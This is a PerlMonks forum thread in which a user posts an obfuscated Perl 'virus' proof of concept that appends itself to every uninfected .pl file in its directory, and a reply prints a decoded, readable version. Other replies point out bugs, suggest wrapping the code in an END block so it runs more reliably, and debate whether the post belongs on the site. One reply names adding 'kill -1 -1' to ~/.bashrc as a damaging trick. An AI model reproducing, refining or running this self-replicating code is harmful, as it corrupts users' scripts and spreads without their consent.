Beefy Boxes and Bandwidth Generously Provided by pair Networks
Clear questions and runnable code
get the best and fastest answer

Simple perl virus PoC

by cyb3rdemon (Initiate)
on Apr 09, 2008 at 00:12 UTC ( #679116=snippet: print w/replies, xml ) Need Help??
Description: A very simple perl virus that I wanted to share. Copies itself to the end of every perl file in its directory that is not already infected; does nothing else. The code is obfuscated to make it harder to recognize (althought, it's not very hard for anyone who knows perl well).
qw{do file reach open print self close while ; auiqi};$a=#;
q{@a = <*>8 1s:fo2(@a){if(m^.pl^){$a=$_83(1,$a)8 7(<1>){next 1s if m`9
+`8} 6 18 3(1,'>>'.$a )8 3(5,$0)8  7(<5>){last if /9/;} 4 1 "#9\n"; 4 
+1 7<5>8  }}};
eval $a;eval;
EDIT: Fixed the bugs that kyle pointed out.
Replies are listed 'Best First'.
Re: Simple perl virus
by kyle (Abbot) on Apr 09, 2008 at 15:20 UTC

    Here's a "decoded" version:

    $_ = q{ @oghi = <*>; files: foreach(@oghi){ if ( m^.pl^ ){ $a = $_; open(file,$a); while (<file>){ next files if m`oghi`; } close file; open(file,'>>'.$a ); open(self,$0); print file while <self>; close file; close self; } } }; eval;

    I haven't run this, but it looks to me as if it has a bug. If you run it by itself, it will "infect" every .pl it finds. Say it infects If I then run, and it gets to this code (i.e., does not die or exit or exec or something), it will try again to infect everything, but at that point, all of will be attached to the new infections (instead of just the virus code).

    Note to future "virus" authors: You don't normally need to call close. Perl will do it for you. Doing this in a virus is like an armed robber saying "please" and "thank you". On the other hand, I found it funny.

      It doesn't work at all in Perl files with a __DATA__/__END__ section.

      And, you could wrap it in a END section. That way it has more chance of actually being run.

      Thought experiment: try thinking of a cracker as a Gentleman thief


      "With greatest regrets, it would appear that all your boxes are belong my family for the last three hundred years. Would you care for a cup of Assam?"


      Results: inconclusive.

Re: Simple perl virus
by zentara (Archbishop) on Apr 09, 2008 at 15:04 UTC
    The node title may be disconcerting, but I don't think it should be deleted. At the very least it's a good reminder not to run obfuscated code, without investigating it first. Its good to be reminded of that occaisionally.... even on linux, a rogue script can do alot of damage to your home directory. What if it modified your ~./bashrc and added kill -1 -1 to it? Alot of people would be stumped and be stuck with a broken system. I shudder to think of what damage could be done to a Microsoft Windows system.

    I'm not really a human, but I play one on earth. Cogito ergo sum a bum
Re: Simple perl virus
by stvn (Monsignor) on Apr 09, 2008 at 14:34 UTC

    Someone please delete this node, perlmonks is not the place for script-kiddie-cracker bullshit, there are plenty of other places on the internet to spread this kind of stuff.

      I haven't checked the code in the OP carefully, but if it acts as (and only as) OP wrote, would you have such a strong reaction were it entitled with something like "Modifying scripts en masse?"

      Sorry, --, for what seems (obviously, you mileage varies, and you're entitled to that opinion) an excess of outrage.

        ... would you have such a strong reaction were it entitled with something like "Modifying scripts en masse?"

        No I would not, but that is not what it is entitled, and the OP specifically says

        The code is obfuscated to make it harder to recognize

        But yeah MMMV, but I see no reason to encourage stuff like this to be posted here. If the OP wants to change his post title to something a little more appropriate then I would be much less "outraged" (although truth be told, I was only really "annoyed", the "outrage" is just the "internet amplifier" working to my disadvantage).

Log In?

What's my password?
Create A New User
Node Status?
node history
Node Type: snippet [id://679116]
[james28909]: compiled and install perl 5.16.3 in WSL
[james28909]: seems to work fine so far. have not tested any modules yet though

How do I use this? | Other CB clients
Other Users?
Others lurking in the Monastery: (4)
As of 2018-05-22 22:24 GMT
Find Nodes?
    Voting Booth?